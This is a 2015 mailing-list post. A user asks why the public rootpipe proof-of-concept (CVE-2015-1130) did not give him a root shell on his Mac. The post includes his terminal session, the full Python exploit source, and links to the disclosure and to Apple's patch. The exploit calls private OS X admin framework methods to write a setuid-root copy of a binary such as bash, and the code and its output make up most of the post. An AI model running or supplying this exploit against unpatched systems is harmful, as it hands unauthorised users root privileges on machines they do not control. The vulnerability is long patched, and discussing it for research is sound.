exploit

12 views

Skip to first unread message

Stuart Cracraft

unread,

Apr 11, 2015, 1:01:15 AM4/11/15

to nscodernigh...@googlegroups.com, cocoaheads...@googlegroups.com, Stuart Cracraft

While I agree that setuid 0 is a bad idea, I don’t see the outcome

of running the code and example on an unpatched Mac as giving

me a shell with a uid of 0, as evidenced by the ownership/mode of

the touched file (abc) being the same as in an unprivileged shell.

Did I miss something?

The run is:

mclure:security smcracraft$ id

uid=1403094701(smcracraft) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),404(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh),403(com.apple.sharepoint.group.1)

mclure:security smcracraft$ ./cve-2015-1130.py /bin/bash ./rootbash

will write file /Users/smcracraft/src/security/rootbash

Done!

mclure:security smcracraft$ ls -l rootbash

-rwsrwxrwx  1 root  staff  628640 Apr 10 21:52 rootbash

mclure:security smcracraft$ ./rootbash

rootbash-3.2$ id

uid=1403094701(smcracraft) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),404(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh),403(com.apple.sharepoint.group.1)

rootbash-3.2$ touch /tmp/abc

rootbash-3.2$ ls -l /tmp/abc

-rw-r--r--  1 smcracraft  wheel  0 Apr 10 21:52 /tmp/abc

rootbash-3.2$ exit

exit

mclure:security smcracraft$ ls -l rootbash

-rwsrwxrwx  1 root  staff  628640 Apr 10 21:52 rootbash

mclure:security smcracraft$ grep root /etc/passwd

root:*:0:0:System Administrator:/var/root:/bin/sh

daemon:*:1:1:System Services:/var/root:/usr/bin/false

_cvmsroot:*:212:212:CVMS Root:/var/empty:/usr/bin/false

mclure:security smcracraft$ 

mclure:security smcracraft$ touch /tmp/def
mclure:security smcracraft$ ls -l /tmp/def
-rw-r--r--  1 smcracraft  wheel  0 Apr 10 21:56 /tmp/def
mclure:security smcracraft$ 

The code is:

#!/usr/bin/python

########################################################

#

#  PoC exploit code for rootpipe (CVE-2015-1130)

#

#  Created by Emil Kvarnhammar, TrueSec

#

#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2

#

#

# python thisscript.py /bin/bash ./rootbash

# ls -l rootbash

# If you see the setuid bit set, then you're compromised.

#

########################################################

import os

import sys

import platform

import re

import ctypes

import objc

import sys

from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions

from Foundation import NSAutoreleasePool

def load_lib(append_path):

    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);

def use_old_api():

    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])

args = sys.argv

if len(args) != 3:

    print "usage: exploit.py source_binary dest_binary_as_root"

    sys.exit(-1)

source_binary = args[1]

dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):

    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()

attr.setValue_forKey_(04777, NSFilePosixPermissions)

data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():

    adm_lib = load_lib("/Admin.framework/Admin")

    Authenticator = objc.lookUpClass("Authenticator")

    ToolLiaison = objc.lookUpClass("ToolLiaison")

    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()

    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8

    authent.authenticateUsingAuthorizationSync_(authref)

    st = ToolLiaison.sharedToolLiaison()

    tool = st.tool()

    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)

else:

    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")

    WriteConfigClient = objc.lookUpClass("WriteConfigClient")

    client = WriteConfigClient.sharedClient()

    client.authenticateUsingAuthorizationSync_(None)

    tool = client.remoteProxy()

    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)

print "Done!"

del pool

The announcement:

https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/

The patch:

https://support.apple.com/en-us/HT204659

Specifics:

Admin Framework
Available for: OS X Yosemite v10.10 to v10.10.2
Impact: A process may gain admin privileges without properly authenticating
Description: An issue existed when checking XPC entitlements. This issue was addressed with improved entitlement checking.
CVE-ID
CVE-2015-1130 : Emil Kvarnhammar at TrueSec

Reply all

Reply to author

Forward

0 new messages